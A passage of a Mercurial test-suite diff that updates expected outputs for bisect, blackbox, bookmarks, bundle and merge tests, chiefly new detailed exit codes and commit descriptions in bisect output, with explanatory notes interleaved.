+ changeset 7:03750880c6b5 "msg 7": good
+ changeset 3:b53bea5e2fcb "msg 3": bad
+ changeset 5:7874a09ea728 "msg 5": bad
+ changeset 6:a3d5c6fdf0d3 "msg 6": good
The first good revision is:
changeset: 6:a3d5c6fdf0d3
user: test
@@ -543,17 +543,17 @@
$ hg bisect -r
$ hg up -qr tip
$ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params"
- changeset 31:58c80a7c8a40: good
+ changeset 31:58c80a7c8a40 tip "msg 31": good
abort: cannot bisect (no known bad revisions)
[20]
$ hg up -qr 0
$ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params"
- changeset 0:b99c7b9c8e11: bad
- changeset 15:e7fa0811edb0: good
- changeset 7:03750880c6b5: good
- changeset 3:b53bea5e2fcb: bad
- changeset 5:7874a09ea728: bad
- changeset 6:a3d5c6fdf0d3: good
+ changeset 0:b99c7b9c8e11 "msg 0": bad
+ changeset 15:e7fa0811edb0 "msg 15": good
+ changeset 7:03750880c6b5 "msg 7": good
+ changeset 3:b53bea5e2fcb "msg 3": bad
+ changeset 5:7874a09ea728 "msg 5": bad
+ changeset 6:a3d5c6fdf0d3 "msg 6": good
The first good revision is:
changeset: 6:a3d5c6fdf0d3
user: test
@@ -586,13 +586,13 @@
$ hg bisect --reset
$ hg bisect --good 15
$ hg bisect --bad 30
- Testing changeset 22:06c7993750ce (15 changesets remaining, ~3 tests)
+ Testing changeset 22:06c7993750ce "msg 22" (15 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect --command true
- changeset 22:06c7993750ce: good
- changeset 26:3efc6fd51aeb: good
- changeset 28:8e0c2264c8af: good
- changeset 29:b5bd63375ab9: good
+ changeset 22:06c7993750ce "msg 22": good
+ changeset 26:3efc6fd51aeb "msg 26": good
+ changeset 28:8e0c2264c8af "msg 28": good
+ changeset 29:b5bd63375ab9 "msg 29": good
The first bad revision is:
changeset: 30:ed2d2f24b11c
tag: tip
@@ -735,11 +735,11 @@
$ hg bisect --reset
$ hg bisect --good .
$ hg bisect --bad 25
- Testing changeset 28:8e0c2264c8af (6 changesets remaining, ~2 tests)
+ Testing changeset 28:8e0c2264c8af "msg 28" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect --command true
- changeset 28:8e0c2264c8af: good
- changeset 26:3efc6fd51aeb: good
+ changeset 28:8e0c2264c8af "msg 28": good
+ changeset 26:3efc6fd51aeb "msg 26": good
The first good revision is:
changeset: 26:3efc6fd51aeb
user: test
--- a/tests/test-bisect2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bisect2.t Tue Apr 20 11:01:06 2021 -0400
@@ -252,7 +252,7 @@
$ hg bisect -r
$ hg bisect -g 0
$ hg bisect -b 17 # -> update to rev 6
- Testing changeset 6:a214d5d3811a (15 changesets remaining, ~3 tests)
+ Testing changeset 6:a214d5d3811a "merge 4,5" (15 changesets remaining, ~3 tests)
0 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -274,16 +274,16 @@
16:609d82a7ebae
$ hg log -q -r 'bisect(ignored)'
$ hg bisect -g # -> update to rev 13
- Testing changeset 13:b0a32c86eb31 (9 changesets remaining, ~3 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (9 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 10
- Testing changeset 10:429fcd26f52d (9 changesets remaining, ~3 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (9 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -b # -> update to rev 8
- Testing changeset 8:dab8161ac8fc (3 changesets remaining, ~1 tests)
+ Testing changeset 8:dab8161ac8fc "8" (3 changesets remaining, ~1 tests)
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -g # -> update to rev 9
- Testing changeset 9:3c77083deb4a (2 changesets remaining, ~1 tests)
+ Testing changeset 9:3c77083deb4a "9" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
The first bad revision is:
@@ -350,10 +350,10 @@
$ hg bisect -r
$ hg bisect -g 18
$ hg bisect -b 1 # -> update to rev 6
- Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests)
+ Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests)
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 10
- Testing changeset 10:429fcd26f52d (13 changesets remaining, ~3 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (13 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -361,7 +361,7 @@
6:a214d5d3811a
18:d42e18c7bc9b
$ hg bisect -b # -> update to rev 12
- Testing changeset 12:9f259202bbe7 (5 changesets remaining, ~2 tests)
+ Testing changeset 12:9f259202bbe7 "12" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -381,7 +381,7 @@
13:b0a32c86eb31
15:857b178a7cf3
$ hg bisect -b # -> update to rev 13
- Testing changeset 13:b0a32c86eb31 (3 changesets remaining, ~1 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first good revision is:
@@ -414,7 +414,7 @@
$ hg bisect -r
$ hg bisect -g 1
$ hg bisect -b 16 # -> update to rev 6
- Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests)
+ Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests)
2 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -422,13 +422,13 @@
16:609d82a7ebae
17:228c06deef46
$ hg bisect -g # -> update to rev 13
- Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 10
- Testing changeset 10:429fcd26f52d (8 changesets remaining, ~3 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (8 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 12
- Testing changeset 12:9f259202bbe7 (8 changesets remaining, ~3 tests)
+ Testing changeset 12:9f259202bbe7 "12" (8 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -443,10 +443,10 @@
16:609d82a7ebae
17:228c06deef46
$ hg bisect -g # -> update to rev 9
- Testing changeset 9:3c77083deb4a (5 changesets remaining, ~2 tests)
+ Testing changeset 9:3c77083deb4a "9" (5 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 15
- Testing changeset 15:857b178a7cf3 (5 changesets remaining, ~2 tests)
+ Testing changeset 15:857b178a7cf3 "merge 10,13" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(ignored)'
$ hg bisect -b
@@ -500,13 +500,13 @@
$ hg bisect -r
$ hg bisect -g 17
$ hg bisect -b 8 # -> update to rev 13
- Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests)
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -b # -> update to rev 10
- Testing changeset 10:429fcd26f52d (5 changesets remaining, ~2 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -b # -> update to rev 15
- Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests)
+ Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -524,7 +524,7 @@
13:b0a32c86eb31
17:228c06deef46
$ hg bisect -s # -> update to rev 16
- Testing changeset 16:609d82a7ebae (3 changesets remaining, ~1 tests)
+ Testing changeset 16:609d82a7ebae "16" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -612,7 +612,7 @@
$ hg bisect -r
$ hg bisect -b 17
$ hg bisect -g 11
- Testing changeset 13:b0a32c86eb31 (5 changesets remaining, ~2 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg log -q -r 'bisect(ignored)'
2:051e12f87bf1
@@ -623,7 +623,7 @@
9:3c77083deb4a
10:429fcd26f52d
$ hg bisect -g
- Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests)
+ Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests)
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
The first bad revision is:
@@ -665,7 +665,7 @@
9:3c77083deb4a
10:429fcd26f52d
$ hg bisect --extend
- Extending search to changeset 8:dab8161ac8fc
+ Extending search to changeset 8:dab8161ac8fc "8"
2 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
$ hg log -q -r 'bisect(ignored)'
@@ -677,7 +677,7 @@
9:3c77083deb4a
10:429fcd26f52d
$ hg bisect -g # dab8161ac8fc
- Testing changeset 9:3c77083deb4a (3 changesets remaining, ~1 tests)
+ Testing changeset 9:3c77083deb4a "9" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
9:3c77083deb4a
@@ -757,13 +757,13 @@
$ hg bisect -r
$ hg bisect -b 13
$ hg bisect -g 8
- Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests)
+ Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests)
2 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
11:82ca6f06eccd
12:9f259202bbe7
$ hg bisect -g 2
- Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests)
+ Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests)
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(untested)'
11:82ca6f06eccd
--- a/tests/test-bisect3.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bisect3.t Tue Apr 20 11:01:06 2021 -0400
@@ -72,13 +72,13 @@
$ hg bisect --good 4
$ hg bisect --good 6
$ hg bisect --bad 12
- Testing changeset 9:2197c557e14c (6 changesets remaining, ~2 tests)
+ Testing changeset 9:2197c557e14c "9=8+3" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect --bad 10
- Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests)
+ Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests)
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect --skip 7
- Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests)
+ Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests)
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
test template
--- a/tests/test-blackbox.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-blackbox.t Tue Apr 20 11:01:06 2021 -0400
@@ -317,6 +317,17 @@
1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> --debug log -r tip exited 0 after *.?? seconds (glob)
1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> blackbox
+Skip rotation if the .hg directory is read-only
+
+#if unix-permissions
+ $ chmod -w .hg
+ $ hg log -r. -T '{rev}\n' --config blackbox.maxsize=1 --debug
+ warning: cannot rename '$TESTTMP/blackboxtest3/.hg/blackbox.log.1' to '$TESTTMP/blackboxtest3/.hg/blackbox.log': Permission denied
+ warning: cannot write to blackbox.log: Permission denied
+ 1
+ $ chmod +w .hg
+#endif
+
Test log recursion from dirty status check
$ cat > ../r.py <<EOF
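
NOTE: the read-only test above pins down the intended failure mode: when
.hg cannot be written, rotation downgrades to warnings and the command
still succeeds (the "1" is the normal log output). A rough sketch of that
shape, illustrative only and not Mercurial's actual implementation:

    import os

    def rotate_or_warn(path, maxsize, warn):
        """Rotate a log file, degrading any failure to a warning."""
        try:
            if os.path.getsize(path) >= maxsize:
                os.rename(path, path + '.1')
        except OSError as exc:
            # logging is best-effort; never abort the command for it
            warn('warning: cannot rotate %s: %s\n' % (path, exc.strerror))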
--- a/tests/test-bookmarks-pushpull.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bookmarks-pushpull.t Tue Apr 20 11:01:06 2021 -0400
@@ -129,10 +129,10 @@
bundle2-output: bundle parameter:
bundle2-output: start of parts
bundle2-output: bundle part: "replycaps"
- bundle2-output-part: "replycaps" 241 bytes payload
+ bundle2-output-part: "replycaps" 224 bytes payload
bundle2-output: part 0: "REPLYCAPS"
bundle2-output: header chunk size: 16
- bundle2-output: payload chunk size: 241
+ bundle2-output: payload chunk size: 224
bundle2-output: closing payload chunk
bundle2-output: bundle part: "check:bookmarks"
bundle2-output-part: "check:bookmarks" 23 bytes payload
@@ -162,9 +162,9 @@
bundle2-input: part parameters: 0
bundle2-input: found a handler for part replycaps
bundle2-input-part: "replycaps" supported
- bundle2-input: payload chunk size: 241
+ bundle2-input: payload chunk size: 224
bundle2-input: payload chunk size: 0
- bundle2-input-part: total payload size 241
+ bundle2-input-part: total payload size 224
bundle2-input: part header size: 22
bundle2-input: part type: "CHECK:BOOKMARKS"
bundle2-input: part id: "1"
@@ -241,10 +241,10 @@
bundle2-output: bundle parameter:
bundle2-output: start of parts
bundle2-output: bundle part: "replycaps"
- bundle2-output-part: "replycaps" 241 bytes payload
+ bundle2-output-part: "replycaps" 224 bytes payload
bundle2-output: part 0: "REPLYCAPS"
bundle2-output: header chunk size: 16
- bundle2-output: payload chunk size: 241
+ bundle2-output: payload chunk size: 224
bundle2-output: closing payload chunk
bundle2-output: bundle part: "check:bookmarks"
bundle2-output-part: "check:bookmarks" 23 bytes payload
@@ -275,9 +275,9 @@
bundle2-input: part parameters: 0
bundle2-input: found a handler for part replycaps
bundle2-input-part: "replycaps" supported
- bundle2-input: payload chunk size: 241
+ bundle2-input: payload chunk size: 224
bundle2-input: payload chunk size: 0
- bundle2-input-part: total payload size 241
+ bundle2-input-part: total payload size 224
bundle2-input: part header size: 22
bundle2-input: part type: "CHECK:BOOKMARKS"
bundle2-input: part id: "1"
@@ -1177,7 +1177,7 @@
searching for changes
no changes found
abort: prepushkey hook exited with status 1
- [255]
+ [40]
#endif
@@ -1217,7 +1217,7 @@
no changes found
remote: prepushkey hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
#endif
@@ -1257,7 +1257,7 @@
no changes found
remote: prepushkey hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
#endif
@@ -1334,7 +1334,7 @@
no changes found
remote: prepushkey.no-bm-move hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
#endif
-- test for pushing bookmarks pointing to secret changesets
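
NOTE: both replycaps shrinkages in this patch (241 -> 224 here, 224 -> 207
in the earlier push tests) are exactly 17 bytes, which matches dropping a
single 'rev-branch-cache' entry plus its separator from the advertised
capabilities; the capability-list hunks in test-clone-uncompressed.t below
show that entry disappearing. This is an inference from the numbers, not a
statement about the wire format:

    # 'rev-branch-cache' plus one separator byte accounts for the delta
    assert len('rev-branch-cache') + 1 == 17
    assert 241 - 224 == 224 - 207 == 17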
--- a/tests/test-bookmarks.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bookmarks.t Tue Apr 20 11:01:06 2021 -0400
@@ -1125,7 +1125,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ cp .hg/bookmarks.pending.saved .hg/bookmarks.pending
(check visible bookmarks while transaction running in repo)
@@ -1158,7 +1158,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
Check pretxnclose-bookmark can abort a transaction
--------------------------------------------------
@@ -1242,7 +1242,7 @@
transaction abort!
rollback completed
abort: pretxnclose-bookmark.force-public hook exited with status 1
- [255]
+ [40]
create on a public changeset
@@ -1254,4 +1254,4 @@
transaction abort!
rollback completed
abort: pretxnclose-bookmark.force-forward hook exited with status 1
- [255]
+ [40]
--- a/tests/test-bundle-r.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle-r.t Tue Apr 20 11:01:06 2021 -0400
@@ -171,14 +171,15 @@
should fail
$ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg test-3
- abort: --base is incompatible with specifying a destination
+ abort: --base is incompatible with specifying destinations
[10]
$ hg -R test bundle -a -r tip test-bundle-branch1.hg test-3
- abort: --all is incompatible with specifying a destination
+ abort: --all is incompatible with specifying destinations
[10]
$ hg -R test bundle -r tip test-bundle-branch1.hg
- abort: repository default-push not found
- [255]
+ config error: default repository not configured!
+ (see 'hg help config.paths')
+ [30]
$ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg
2 changesets found
@@ -223,7 +224,7 @@
adding changesets
transaction abort!
rollback completed
- abort: 00changelog.i@93ee6ab32777: unknown parent
+ abort: 00changelog.i@93ee6ab32777cd430e07da694794fb6a4f917712: unknown parent
[50]
revision 2
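
NOTE: the bracketed numbers replacing [255] throughout this patch are
Mercurial's detailed exit codes. The mapping below is inferred from the
expected outputs in these hunks, not quoted from mercurial/error.py:

    DETAILED_EXIT_CODES = {
        10: 'input error (e.g. --base/--all combined with a destination)',
        20: 'state error (untracked file conflicts, nothing to bisect)',
        30: 'config error (default repository not configured)',
        40: 'a hook aborted the operation (pretxnclose, prepushkey, ...)',
        50: 'storage error (00changelog.i: unknown parent)',
        100: 'remote error (push or pull failed on remote)',
    }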
--- a/tests/test-bundle-type.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle-type.t Tue Apr 20 11:01:06 2021 -0400
@@ -201,6 +201,15 @@
(see 'hg help bundlespec' for supported values for --type)
[10]
+zstd supports threading
+
+ $ hg init test-compthreads
+ $ cd test-compthreads
+ $ hg debugbuilddag +3
+ $ hg --config experimental.bundlecompthreads=1 bundle -a -t zstd-v2 zstd-v2-threaded.hg
+ 3 changesets found
+ $ cd ..
+
#else
zstd is a valid engine but isn't available
--- a/tests/test-bundle.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle.t Tue Apr 20 11:01:06 2021 -0400
@@ -295,18 +295,29 @@
#if reporevlogstore
$ hg -R test debugcreatestreamclonebundle packed.hg
- writing 2664 bytes for 6 files
- bundle requirements: generaldelta, revlogv1, sparserevlog
+ writing 2664 bytes for 6 files (no-zstd !)
+ writing 2665 bytes for 6 files (zstd !)
+ bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !)
$ f -B 64 --size --sha1 --hexdump packed.hg
- packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5
+ packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !)
+ packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd no-rust !)
+ packed.hg: size=2860, sha1=81d7a2e535892cda51e82c200f818de2cca828d3 (rust !)
0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 06 00 00 |HGS1UN..........|
- 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald|
- 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp|
- 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/|
+ 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !)
+ 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (no-zstd !)
+ 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (no-zstd !)
+ 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd no-rust !)
+ 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (zstd no-rust !)
+ 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (zstd no-rust !)
+ 0010: 00 00 00 00 0a 69 00 36 67 65 6e 65 72 61 6c 64 |.....i.6generald| (rust !)
+ 0020: 65 6c 74 61 2c 70 65 72 73 69 73 74 65 6e 74 2d |elta,persistent-| (rust !)
+ 0030: 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f 67 76 31 |nodemap,revlogv1| (rust !)
$ hg debugbundle --spec packed.hg
- none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog
+ none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog (no-rust !)
+ none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog (rust !)
generaldelta requirement is not listed in stream clone bundles unless used
@@ -317,17 +328,23 @@
$ cd ..
$ hg -R testnongd debugcreatestreamclonebundle packednongd.hg
writing 301 bytes for 3 files
- bundle requirements: revlogv1
+ bundle requirements: revlogv1 (no-rust !)
+ bundle requirements: persistent-nodemap, revlogv1 (rust !)
$ f -B 64 --size --sha1 --hexdump packednongd.hg
- packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f
+ packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f (no-rust !)
+ packednongd.hg: size=402, sha1=d3cc1417f0e8142cf9340aaaa520b660ad3ec3ea (rust !)
0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 03 00 00 |HGS1UN..........|
- 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1|
- 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..|
- 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+ 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| (no-rust !)
+ 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| (no-rust !)
+ 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| (no-rust !)
+ 0010: 00 00 00 00 01 2d 00 1c 70 65 72 73 69 73 74 65 |.....-..persiste| (rust !)
+ 0020: 6e 74 2d 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f |nt-nodemap,revlo| (rust !)
+ 0030: 67 76 31 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 |gv1.data/foo.i.6| (rust !)
$ hg debugbundle --spec packednongd.hg
- none-packed1;requirements%3Drevlogv1
+ none-packed1;requirements%3Drevlogv1 (no-rust !)
+ none-packed1;requirements%3Dpersistent-nodemap%2Crevlogv1 (rust !)
Warning emitted when packed bundles contain secret changesets
@@ -341,7 +358,8 @@
$ hg -R testsecret debugcreatestreamclonebundle packedsecret.hg
(warning: stream clone bundle will contain secret revisions)
writing 301 bytes for 3 files
- bundle requirements: generaldelta, revlogv1, sparserevlog
+ bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !)
Unpacking packed1 bundles with "hg unbundle" isn't allowed
@@ -733,7 +751,7 @@
partial history bundle, fails w/ unknown parent
$ hg -R bundle.hg verify
- abort: 00changelog.i@bbd179dfa0a7: unknown parent
+ abort: 00changelog.i@bbd179dfa0a71671c253b3ae0aa1513b60d199fa: unknown parent
[50]
full history bundle, refuses to verify non-local repo
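
NOTE: the '(zstd !)', '(no-zstd !)' and '(rust !)' suffixes in these
expected outputs are run-tests.py feature annotations: a line so marked is
only required when the named hghave feature is present (or absent, with
the no- prefix), letting one .t file cover several build configurations.
From the hunk above:

      $ hg -R test debugcreatestreamclonebundle packed.hg
      writing 2664 bytes for 6 files (no-zstd !)
      writing 2665 bytes for 6 files (zstd !)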
--- a/tests/test-bundle2-exchange.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle2-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -548,7 +548,7 @@
remote: Abandon ship!
remote: (don't panic)
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
@@ -556,7 +556,7 @@
remote: Abandon ship!
remote: (don't panic)
abort: push failed on remote
- [255]
+ [100]
Doing the actual push: unknown mandatory parts
@@ -570,19 +570,19 @@
pushing to other
searching for changes
abort: missing support for test:unknown
- [255]
+ [100]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
searching for changes
abort: missing support for test:unknown
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
searching for changes
abort: missing support for test:unknown
- [255]
+ [100]
Doing the actual push: race
@@ -638,7 +638,7 @@
remote: Cleaning up the mess...
remote: rollback completed
abort: pretxnclose.failpush hook exited with status 1
- [255]
+ [40]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
@@ -653,7 +653,7 @@
remote: rollback completed
remote: pretxnclose.failpush hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
@@ -668,7 +668,7 @@
remote: rollback completed
remote: pretxnclose.failpush hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
(check that no 'pending' files remain)
@@ -699,7 +699,7 @@
remote: Cleaning up the mess...
remote: rollback completed
abort: pretxnchangegroup hook exited with status 1
- [255]
+ [40]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
searching for changes
@@ -712,7 +712,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
searching for changes
@@ -725,7 +725,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
Check output capture control.
@@ -747,7 +747,7 @@
Cleaning up the mess...
rollback completed
abort: pretxnchangegroup hook exited with status 1
- [255]
+ [40]
$ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6
pushing to ssh://user@dummy/other
searching for changes
@@ -760,7 +760,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
$ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6
pushing to http://localhost:$HGPORT2/
searching for changes
@@ -773,7 +773,7 @@
remote: rollback completed
remote: pretxnchangegroup hook exited with status 1
abort: push failed on remote
- [255]
+ [100]
Check abort from mandatory pushkey
@@ -950,7 +950,7 @@
searching for changes
remote: Lock should not be taken
abort: push failed on remote
- [255]
+ [100]
$ cat >> ../lazylock/.hg/hgrc <<EOF
> [experimental]
--- a/tests/test-bundle2-remote-changegroup.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bundle2-remote-changegroup.t Tue Apr 20 11:01:06 2021 -0400
@@ -542,7 +542,7 @@
searching for changes
remote: remote-changegroup
abort: missing support for remote-changegroup - digest:foo
- [255]
+ [100]
Missing digest
--- a/tests/test-casecollision-merge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-casecollision-merge.t Tue Apr 20 11:01:06 2021 -0400
@@ -145,7 +145,7 @@
$ hg merge
abort: case-folding collision between [aA] and [Aa] (re)
- [255]
+ [20]
$ hg parents --template '{rev}\n'
4
$ hg status -A
@@ -158,7 +158,7 @@
1 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg merge
abort: case-folding collision between [aA] and [Aa] (re)
- [255]
+ [20]
$ hg parents --template '{rev}\n'
2
$ hg status -A
@@ -213,7 +213,7 @@
$ hg merge 0
abort: case-folding collision between Aa and directory of aA/a
- [255]
+ [20]
(note: no collision between 0 and 00 or 000/f)
Directory case-folding collision:
@@ -328,7 +328,7 @@
A B
$ hg update
abort: case-folding collision between [bB] and [Bb] (re)
- [255]
+ [20]
$ hg update --check
abort: uncommitted changes
--- a/tests/test-casefolding.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-casefolding.t Tue Apr 20 11:01:06 2021 -0400
